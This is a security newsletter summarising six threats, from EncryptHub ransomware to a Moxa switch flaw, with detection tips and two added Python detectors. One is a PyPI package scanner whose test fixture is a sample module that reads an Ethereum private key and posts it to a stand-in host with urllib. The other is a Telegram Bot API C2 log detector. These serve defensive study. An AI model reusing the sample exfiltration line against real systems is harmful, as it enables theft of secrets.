Cybersecurity Threats and Trends - 03/11/2025
From ransomware-as-a-service (RaaS) to persistent IoT exploitation, organizations must remain vigilant.
1. EncryptHub RaaS Deploys Ransomware and Infostealers
Primary Threat: EncryptHub, a ransomware-as-a-service (RaaS) platform, is delivering multi-stage malware combining ransomware encryption and stealthy infostealers. Outpost24 threat intelligence highlights how EncryptHub’s affiliates deploy infostealers prior to encryption to exfiltrate sensitive data, targeting both corporate and government networks. The malware uses customized loaders, making detection more difficult during initial compromise.
Risk: Data exfiltration, ransomware encryption, and extortion demands.
Detection Tips:
- Monitor for unusual data exfiltration prior to encryption events.
- Detect execution of loader components and double extortion activity.
- Implement network segmentation to contain lateral movement.
2. PHP-CGI RCE Flaw Exploited in Attacks Targeting Japan
Primary Threat: Attackers are actively exploiting a critical PHP-CGI remote code execution (RCE) flaw, targeting Japanese organizations. Cisco Talos reports the attacks are leveraging vulnerable PHP installations to gain persistent remote access, escalate privileges, and deploy malware on web servers.
Risk: Full system compromise, website defacement, and sensitive data theft.
Detection Tips:
- Apply immediate patches to PHP-CGI implementations that are vulnerable.
- Monitor for suspicious requests triggering PHP scripts with command injection.
- Implement web application firewalls (WAF) to block malicious traffic.
3. Malicious PyPI Package Steals Ethereum Private Keys
Primary Threat: A malicious PyPI package has been discovered stealing Ethereum private keys and sensitive wallet data. Socket Security researchers reveal that the package uses obfuscated code to harvest credentials, sending the data to attacker-controlled servers. Developers integrating unverified packages are especially at risk.
Risk: Cryptocurrency theft, compromised developer environments, and potential supply chain attacks.
Detection Tips:
- Vet all PyPI packages for suspicious behavior before installation.
- Monitor systems for unusual outbound requests to known exfiltration endpoints.
- Isolate developer environments handling cryptocurrency keys from internet-facing systems.
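One way to act on the first tip, as an added example that is not code from the newsletter or from Socket Security: a small static pre-install scanner that flags the combination the item describes (wallet-secret access plus an outbound channel, or base64-hidden code execution). The sample module, the rule set and the verdict thresholds are constructed assumptions to tune for your own environment.

```python
import os
import re
from typing import Dict, List

# Constructed sample module (not the package from the newsletter): it reads a wallet
# secret from the environment, runs base64-hidden code, and posts data to an outside host.
SUSPICIOUS_SRC = '''
import base64, os, urllib.request
_k = os.environ.get("ETH_PRIVATE_KEY", "")
exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
urllib.request.urlopen("https://updates.example-cdn.test/collect", data=_k.encode())
'''

# Constructed benign module for comparison.
BENIGN_SRC = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

# Heuristic rules (assumed, not from any vendor): rule name -> pattern in the source text.
RULES = {
    "obfuscated_exec": re.compile(r"\b(?:exec|eval)\s*\(\s*base64\.b64decode"),
    "wallet_secret_access": re.compile(r"(?i)private_key|mnemonic|keystore|seed_phrase"),
    "outbound_http": re.compile(r"urllib\.request\.urlopen\(|requests\.(?:post|get)\(|socket\.connect\("),
    "env_harvest": re.compile(r"os\.environ(?:\.get)?\s*[\(\[]"),
}

def scan_source(src: str) -> List[str]:
    """Return the names of every rule that fires on this source text."""
    return [name for name, rx in RULES.items() if rx.search(src)]

def classify(src: str) -> Dict[str, object]:
    """Hidden code execution, or secret access together with an outbound channel,
    is enough to block; any single hit is worth a manual review."""
    findings = scan_source(src)
    hits = set(findings)
    if "obfuscated_exec" in hits or {"wallet_secret_access", "outbound_http"} <= hits:
        verdict = "block"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings}

def scan_package_dir(root: str) -> Dict[str, Dict[str, object]]:
    """Walk an unpacked sdist/wheel and classify every .py file before installing it."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".py"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    report[path] = classify(fh.read())
    return report
```

Run `scan_package_dir` against the extracted archive (`pip download` then unpack) rather than against an installed copy, so nothing in the package executes during vetting.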
Did you know...?
The first ransomware-as-a-service (RaaS) appeared in 2016 with Cerber, offering affiliates up to 40% of ransom payments. EncryptHub represents a new generation of RaaS, combining custom infostealers and multi-stage delivery, showing how RaaS has evolved into a highly profitable criminal business model.
4. Desert Dexter Targets 900 Victims Using Telegram as C2
Primary Threat: Desert Dexter, a sophisticated cyber-espionage group, has targeted over 900 victims across Middle Eastern countries, using Telegram channels for command and control (C2). Positive Technologies reports the group is focused on government entities and energy sector organizations, employing malware capable of surveillance, keylogging, and data exfiltration.
Risk: Espionage, theft of confidential information, and national security compromise.
Detection Tips:
- Monitor network traffic for unauthorized connections to Telegram APIs.
- Flag processes accessing sensitive files and transmitting data to unknown endpoints.
- Harden endpoints with behavioral detection of data exfiltration attempts.
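The first tip, as an added example that is not code from the newsletter or from Positive Technologies: detection logic run over constructed proxy log lines that separates approved Telegram use from unapproved hosts talking to the Bot API, and singles out large uploads as possible exfiltration. The log format, the allowlist, the token placeholder and the size threshold are all assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed proxy log lines (not from any report): ts src_ip method url status bytes_sent
SAMPLE_LOG = """\
2025-03-11T09:01:02Z 10.0.5.21 GET https://www.example.test/ 200 512
2025-03-11T09:02:10Z 10.0.5.21 POST https://api.telegram.org/botPLACEHOLDER_TOKEN/sendDocument 200 184320
2025-03-11T09:02:40Z 10.0.5.21 GET https://api.telegram.org/botPLACEHOLDER_TOKEN/getUpdates 200 310
2025-03-11T09:03:00Z 10.0.7.9 GET https://api.telegram.org/botPLACEHOLDER_TOKEN/getUpdates 200 290
2025-03-11T09:05:00Z 10.0.9.3 GET https://web.telegram.org/ 200 2048
"""

# Assumed: hosts approved to reach Telegram (e.g. a staffed communications workstation).
ALLOWED_SOURCES = {"10.0.9.3"}
# Telegram's public Bot API places the bot token in the path, followed by the method name.
BOT_API = re.compile(r"https?://api\.telegram\.org/bot[^/\s]+/(\w+)")
LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")

def parse(log: str) -> List[Dict[str, object]]:
    events = []
    for raw in log.splitlines():
        m = LINE.match(raw)
        if m:
            ts, src, method, url, _status, nbytes = m.groups()
            events.append({"ts": ts, "src": src, "method": method, "url": url, "bytes": int(nbytes)})
    return events

def is_telegram_host(url: str) -> bool:
    host = url.split("/")[2].lower() if "://" in url else url.lower()
    return host == "telegram.org" or host.endswith(".telegram.org")

def telegram_c2_alerts(log: str, upload_threshold: int = 64 * 1024) -> List[Tuple[str, str, str]]:
    """Return (src_ip, finding, ts) for Telegram traffic from hosts not on the allowlist.
    Any Bot API call is the C2 signal; a large send* call is treated as a possible upload."""
    alerts = []
    for ev in parse(log):
        if ev["src"] in ALLOWED_SOURCES or not is_telegram_host(ev["url"]):
            continue
        m = BOT_API.search(ev["url"])
        if m is None:
            alerts.append((ev["src"], "telegram_contact_unapproved_host", ev["ts"]))
        elif m.group(1).startswith("send") and ev["bytes"] >= upload_threshold:
            alerts.append((ev["src"], "bot_api_upload", ev["ts"]))
        else:
            alerts.append((ev["src"], "bot_api_c2", ev["ts"]))
    return alerts

if __name__ == "__main__":
    for alert in telegram_c2_alerts(SAMPLE_LOG):
        print(alert)
```

Where TLS inspection is not available, the same allowlist check can be applied to DNS or SNI logs on the hostname alone; the Bot API method and byte-count logic then drops out, so every unapproved contact should be reviewed.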
5. Moxa Issues Fix for Vulnerability in Industrial Switches
Primary Threat: Moxa has released a fix for a critical authorization logic flaw (CVE-2024-12297) in its PT Series Ethernet switches, which could allow unauthenticated attackers to access system functions and modify configurations. Moxa’s advisory warns this could impact critical infrastructure reliant on these devices.
Risk: Industrial network compromise, configuration tampering, and operational downtime.
Detection Tips:
- Apply firmware updates released by Moxa to mitigate CVE-2024-12297.
- Monitor for unauthorized access attempts to industrial control systems.
- Segregate critical operational technology (OT) networks from IT networks.
6. Ballista Botnet Exploits TP-Link Devices for DDoS Attacks
Primary Threat: The Ballista Botnet is leveraging unpatched TP-Link devices to orchestrate large-scale DDoS attacks, according to W/Labs. Ballista uses automated exploitation of outdated firmware, infecting devices with a wormable module that expands its reach across networks.
Risk: Botnet-driven DDoS, device hijacking, and infrastructure disruption.
Detection Tips:
- Patch TP-Link devices to the latest firmware versions immediately.
- Monitor unusual outbound traffic from IoT devices.
- Restrict device management interfaces from external access.
IN SUMMARY:
Today’s threats include ransomware-as-a-service platforms, cryptocurrency-focused malware, and vulnerabilities in critical infrastructure. Organizations must prioritize patching, secure software development practices, and network segmentation.
🚨 Key Takeaways:
✔️ EncryptHub RaaS combines ransomware with infostealers for double extortion.
✔️ PHP-CGI flaw enables persistent remote code execution, primarily in Japan.
✔️ Malicious PyPI package steals Ethereum private keys, targeting developers.
✔️ Desert Dexter cyber-espionage leverages Telegram C2 for stealth operations.
✔️ Moxa’s critical flaw in PT switches could expose industrial networks to attack.
✔️ Ballista Botnet expands via unpatched TP-Link devices for large-scale DDoS campaigns.
🔎 Immediate Actions:
✔️ Patch PHP-CGI, Moxa PT Switches, and TP-Link devices immediately.
✔️ Vet open-source dependencies, particularly for PyPI and Go packages.
✔️ Harden cloud, OT, and IT infrastructure to prevent ransomware and botnet exploitation.
✔️ Monitor for C2 traffic, including Telegram-based channels and backconnect malware.
💡 Stay secure, stay patched, and remember: assume breach, defend in depth! 🚀
J.W.
(P.S. Check out our partners! It goes a long way to support this newsletter!)